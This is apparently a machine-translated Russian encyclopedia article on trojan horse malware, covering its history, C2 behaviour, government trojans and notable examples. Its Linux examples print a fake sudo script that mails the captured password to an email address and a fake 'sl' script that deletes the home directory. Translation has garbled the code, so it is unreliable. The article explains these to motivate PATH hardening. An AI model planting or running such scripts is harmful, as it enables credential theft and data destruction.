stringtranslate.com

Троянский конь (компьютеры)

В вычислительной технике троянским конем является любое вредоносное ПО , которое вводит пользователей в заблуждение о своих истинных целях, маскируясь под стандартную программу. Этот термин происходит от древнегреческой истории о обманчивом Троянском коне , который привел к падению города Трои . [1]

Трояны обычно распространяются с помощью той или иной формы социальной инженерии . Например, когда пользователя обманом заставляют выполнить вложение к электронному письму , замаскированное под безобидное (например, заполнение стандартной формы), или щелкнув фальшивую рекламу в социальных сетях или где-либо еще. Хотя их полезная нагрузка может быть любой, многие современные формы действуют как бэкдор , связываясь с контроллером, который затем может получить несанкционированный доступ к зараженному компьютеру. [2] Атаки программ-вымогателей часто осуществляются с использованием троянских программ.

В отличие от компьютерных вирусов и червей , трояны обычно не пытаются внедряться в другие файлы или иным образом распространяться. [3]

Использование термина

Неясно, где и когда эта концепция и этот термин были впервые использованы, но к 1971 году первое руководство по Unix предполагало, что читатели знают и то, и другое: [4]

Кроме того, нельзя изменить владельца файла с включенным битом set-user-ID, иначе можно создать троянских коней, способных злоупотреблять чужими файлами.

Еще одно раннее упоминание содержится в отчете ВВС США за 1974 год об анализе уязвимостей компьютерных систем Multics . [5]

Он стал популярным благодаря Кену Томпсону в его лекции на вручении премии Тьюринга в 1983 году «Размышления о доверии к доверию» [6] с подзаголовком: « В какой степени следует доверять утверждению о том, что программа свободна от троянских коней?» Возможно, важнее доверять людям, написавшим программное обеспечение. Он упомянул, что знал о возможном существовании троянов из отчета о безопасности Multics. [7] [8]

Поведение

После установки трояны могут выполнять ряд вредоносных действий. Многие из них, как правило, связываются с одним или несколькими серверами управления и контроля (C2) через Интернет и ждут инструкций. Поскольку отдельные трояны обычно используют для этого определенного набора портов, их можно относительно легко обнаружить. Более того, другие вредоносные программы потенциально могут «захватить» трояна, используя его в качестве прокси для вредоносных действий. [9]

В немецкоязычных странах шпионское ПО , используемое или созданное правительством, иногда называют программным обеспечением . Govware обычно представляет собой троянскую программу, используемую для перехвата сообщений с целевого компьютера. В некоторых странах, таких как Швейцария и Германия, существует правовая база, регулирующая использование такого программного обеспечения. [10] [11] Примеры правительственных троянов включают швейцарские MiniPanzer и MegaPanzer [12] и немецкий «государственный троян» по прозвищу R2D2 . [10] Немецкое государственное ПО работает, используя бреши в безопасности, неизвестные широкой публике, и получает доступ к данным смартфона до того, как они будут зашифрованы с помощью других приложений. [13]

Благодаря популярности ботнетов среди хакеров и доступности рекламных сервисов, позволяющих авторам нарушать конфиденциальность своих пользователей, трояны становятся все более распространенными. Согласно опросу, проведенному BitDefender с января по июнь 2009 года, «растет число вредоносных программ троянского типа, на их долю приходится 83% глобальных вредоносных программ, обнаруженных в мире». Трояны связаны с червями, поскольку они распространяются с помощью червей и путешествуют вместе с ними по Интернету. [14] BitDefender заявил, что около 15% компьютеров являются членами бот-сети, обычно привлекаемой троянской инфекцией. [15]

Недавние расследования показали, что метод «троянского коня» использовался для атаки на системы облачных вычислений . Троянская атака на облачные системы пытается внедрить в систему приложение или службу, которая может повлиять на облачные службы, изменив или остановив их функциональные возможности. Когда облачная система определяет атаки как законные, выполняется услуга или приложение, которое может повредить и заразить облачную систему. [16]

Пример sudo для Linux

Троянский конь — это программа , которая якобы выполняет какую-то законную функцию, но при выполнении ставит под угрозу безопасность пользователя. [17] Простым примером является следующая вредоносная версия команды sudo в Linux . Злоумышленник поместит этот сценарий в общедоступный для записи каталог (например, /tmp). Если администратор окажется в этом каталоге и запустит sudo, то может запуститься троянец, скомпрометировав пароль администратора.

#!/usr/bin/env bash# Отключить эхо символов на экране. sudo делает это, чтобы пароль пользователя не появлялся на экране при его вводе.
stty  -echo# Запросить у пользователя пароль, а затем прочитать ввод. Чтобы скрыть природу этой вредоносной версии, сделайте это 3 раза, чтобы имитировать поведение sudo, когда пользователь вводит неправильный пароль. Prompt_count = 1 while [ $prompt_count -le 3 ] ; do echo -n "[sudo] пароль для $( whoami ) : " read pass_input echo Sleep 3 # sudo будет делать паузу между повторяющимися запросами Prompt_count = $(( Prompt_count + 1 )) Done                    # Снова включите эхо символов. stty эхо эхо $password_input | mail -s " пароль $( whoami ) " [email protected]      # Отобразить фактическое сообщение об ошибке sudo, а затем удалить self. echo "sudo: 3 попытки неправильного пароля"
rm $0  выход 1 # sudo возвращает 1 при неудачной попытке ввода пароля  

Чтобы предотвратить появление sudo троянского коня , установите .запись в PATHпеременной среды, расположенную в конце. [18] Например: PATH=/usr/local/bin:/usr/bin:..

пример Linux ls

Удобно иметь .где-то PATH, но есть одна загвоздка. [19] Другой пример — следующая вредоносная версия команды ls в Linux . Однако имя файла не ls; вместо этого это так sl. Злоумышленник поместит этот сценарий в общедоступный для записи каталог (например, /tmp).

#!/usr/bin/env bash# Удалить домашний каталог пользователя, затем удалить self. rm  -fr  ~ 2 >/dev/null РМ $0 

Чтобы злонамеренный программист не предвидел эту распространенную ошибку при наборе текста:

  1. опустить .в PATH или
  2. alias sl=ls [а]

Яркие примеры

Частные и государственные

Общедоступно

Обнаружено исследователями безопасности

Капитализация

Компьютерный термин «Троянский конь» происходит от легендарного Троянского коня древнего города Троя . По этой причине слово «Троян» часто пишется с заглавной буквы. Однако, хотя руководства по стилю и словари различаются, многие предлагают использовать «троян» в нижнем регистре для обычного использования. [30] [31]

Смотрите также

Рекомендации

  1. ^ «Определение троянского коня» . Проверено 5 апреля 2012 г. Греческие солдаты, не сумевшие прорвать оборону города Трои в ходе многолетней войны, преподнесли городу в мирное предложение большого деревянного коня.
  2. ^ «Разница между вирусами, червями и троянами». Центр безопасности Симантек . Broadcom Inc. Архивировано из оригинала 19 августа 2013 года . Проверено 29 марта 2020 г.
  3. ^ «Часто задаваемые вопросы о VIRUS-L/comp.virus (FAQ) v2.00 (Вопрос B3: Что такое троянский конь?)» . 9 октября 1995 года. Архивировано из оригинала 5 августа 2020 года . Проверено 16 сентября 2019 г.
  4. ^ Томпсон, Кен; Ричи, Деннис М. «Руководство программиста Unix, 3 ноября 1971 г.» (PDF) . Проверено 28 марта 2020 г.
  5. ^ Каргер, Пенсильвания; Шелл, Р.Р., «Оценка безопасности Multiks: анализ уязвимостей, ESD-TR-74-193» (PDF) , HQ Electronic Systems Division: Hanscom AFB, MA , II , заархивировано из оригинала (PDF) 9 июля 2011 г. , получено 24 декабря 2017 г.
  6. ^ Кен Томпсон (1984). «Размышление о доверии». Коммун. АКМ . 27 (8): 761–763. дои : 10.1145/358198.358210 ..
  7. ^ Пол А. Каргер; Роджер Р. Шелл (2002), «Тридцать лет спустя: уроки оценки безопасности Multics» (PDF) , ACSAC : 119–126
  8. ^ Каргер и Шелл писали, что Томпсон добавил эту ссылку в более позднюю версию своей конференции Тьюринга: Кен Томпсон (ноябрь 1989 г.), «О доверии», Unix Review , 7 (11): 70–74
  9. ^ Крапанцано, Джейми (2003). Деконструкция SubSeven, любимого троянского коня (Отчет). Институт САНС . Проверено 10 мая 2021 г.
  10. ^ ab Бэзил Купа, Воскресший троянский конь: о законности использования государственного шпионского ПО (Govware), LISS 2013, стр. 419–428.
  11. ^ "Häufig gestellte Fragen (Часто задаваемые вопросы)" . Федеральное министерство юстиции и полиции. Архивировано из оригинала 6 мая 2013 года.
  12. Данн, Джон (27 августа 2009 г.). «Швейцарский программист рекламирует правительственный шпионский троян» . ТехМир . Архивировано из оригинала 26 января 2014 года . Проверено 10 января 2021 г.
  13. ^ «Федеральная полиция Германии использует троянский вирус, чтобы обойти шифрование телефона» . ДВ . Проверено 14 апреля 2018 г.
  14. ^ «Опрос BitDefender по вредоносному ПО и спаму показал, что электронные угрозы адаптируются к поведенческим тенденциям в Интернете» . БитДефендер . Архивировано из оригинала 8 августа 2009 года . Проверено 27 марта 2020 г.
  15. Датта, Ганеш (7 августа 2014 г.). «Что такое трояны?». СекурЭйд . Архивировано из оригинала 12 августа 2014 года . Проверено 27 марта 2020 г.
  16. ^ Канакер, Хасан; Карим, Надер Абдель; Аввад, Самер AB; Исмаил, Нурул ХА; Зраку, Джамал; Али, Абдулла М.Ф. Аль (20 декабря 2022 г.). «Обнаружение заражения троянскими конями в облачной среде с использованием машинного обучения». Международный журнал интерактивных мобильных технологий (IJIM) . 16 (24): 81–106. дои : 10.3991/ijim.v16i24.35763 . ISSN  1865-7923.
  17. ^ Вуд, Патрик Х.; Кочан, Стивен Г. (1985). Безопасность системы UNIX . Книги Хайдена. п. 42. ИСБН 0-8104-6267-2.
  18. ^ Вуд, Патрик Х.; Кочан, Стивен Г. (1985). Безопасность системы UNIX . Книги Хайдена. п. 43. ИСБН 0-8104-6267-2. Вышеупомянутый троянский конь работает только в том случае, если PATH пользователя настроен на поиск команд в текущем каталоге перед поиском в системных каталогах.
  19. ^ "Что плохого в том, чтобы иметь '.' в вашем $PATH?". Пенн Инжиниринг . Проверено 28 ноября 2023 г. [Если] вы неуклюжая машинистка и однажды наберете «sl -l» вместо «ls -l», вы рискуете запустить «./sl», если таковой имеется. Какой-нибудь «умный» программист мог бы предвидеть распространенные ошибки при наборе текста и оставить программы с такими именами разбросанными по общедоступным каталогам. Остерегаться.
  20. ^ Сет, Кулаков (1998). «Это все еще троянский конь или действительный инструмент удаленного администрирования?» (Отчет). Институт САНС . Проверено 10 мая 2021 г.
  21. ^ "Мега-Панцер". СоурсФордж . 21 сентября 2016 г.
  22. ^ "Мини-Танцер". СоурсФордж . 18 сентября 2016 г.
  23. ^ «Что такое вирус Сова?». Индия сегодня .
  24. ^ «Семейство зараженных троянами рекламных программ злоупотребляет службой специальных возможностей, чтобы устанавливать любые приложения, которые оно хочет - блог Lookout» .
  25. Нил, Дэйв (20 ноября 2015 г.). «Рекламное ПО-троян Shedun попадает в службу специальных возможностей Android». Спрашивающий . Острые деловые СМИ. Архивировано из оригинала 22 ноября 2015 года . Проверено 27 марта 2020 г.{{cite web}}: CS1 maint: unfit URL (link)
  26. ^ «Lookout обнаруживает новое рекламное ПО, зараженное троянами; 20 тысяч популярных приложений попали под перекрестный огонь - блог Lookout» .
  27. ^ «Вредоносные программы Shuanet, ShiftyBug и Shedun могут автоматически рутировать ваш Android» . 5 ноября 2015 г.
  28. Times, Tech (9 ноября 2015 г.). «Новое семейство вредоносных программ для Android, которые практически невозможно удалить: поздоровайтесь с Shedun, Shuanet и ShiftyBug».
  29. ^ «Рекламное ПО для Android может установиться, даже если пользователи явно отклоняют его». 19 ноября 2015 г.
  30. ^ "Троян". Расширенный словарь Коллинза . Проверено 29 марта 2020 г.
  31. ^ "Троянский конь". Руководство по стилю Microsoft . Майкрософт . Проверено 29 марта 2020 г.

Примечания

  1. ^ Поместите aliasоператор в /etc/profile.

Внешние ссылки